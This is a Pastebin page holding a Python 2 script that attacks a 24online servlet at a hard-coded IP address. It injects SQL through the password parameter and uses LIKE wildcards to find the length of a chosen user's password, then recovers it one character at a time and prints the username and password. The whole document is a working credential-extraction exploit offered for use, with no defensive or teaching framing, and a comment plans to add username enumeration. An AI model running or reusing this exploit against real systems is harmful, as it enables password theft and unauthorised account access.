Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import sys
- import urllib2
- import xmltodict
- try:
- username = sys.argv[1];
- except:
- username = raw_input("Enter username: ");
- def getURL(guess, username):
- urlstring = "http://1.186.15.77/24online/servlet/AjaxManager?mode=2000&nasip=1.186.15.74&password=" + guess + "%27%20and%20((username%20Like%20%27" + username + "%27)%20)%20);%20--"
- return urlstring;
- characters = "abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ!@$%^&*_+?><,.;"
- def getPasswordLength(username):
- guessString = "_"
- done = False;
- while not done:
- urlstring = getURL(guessString, username);
- webresp = urllib2.urlopen(urlstring);
- xmldata = webresp.read();
- resp = xmltodict.parse(xmldata);
- rstatus = resp['response']['returnstatus'];
- if (rstatus == '-1'):
- guessString += "_"
- else:
- return len(guessString);
- done = True;
- pass
- def getPassword(username):
- length = getPasswordLength(username);
- glen = 0
- guessstr = []
- for i in range(0, length):
- guessstr.append('_');
- print("Length = " + str(length));
- while glen < length:
- matchc = False;
- index = 0;
- while not matchc:
- guessstr[glen] = characters[index];
- guessString = "".join(guessstr);
- urlstring = getURL(guessString, username);
- webresp = urllib2.urlopen(urlstring);
- xmldata = webresp.read();
- resp = xmltodict.parse(xmldata);
- rstatus = resp['response']['returnstatus'];
- if (rstatus == '0'):
- pguess = resp['response']['password'];
- print(pguess[0:length])
- glen += 1;
- break;
- index += 1;
- if (index == len(characters)):
- break;
- pass
- pass
- password = "".join(guessString);
- returnstring = "\n" + str(username) + ", " + str(password) + "\n";
- print(returnstring);
- return returnstring;
- # TO-DO: Add 'OR' SQL injection to check if username exists or not
- getPassword(username);
Add Comment
Please, Sign In to add comment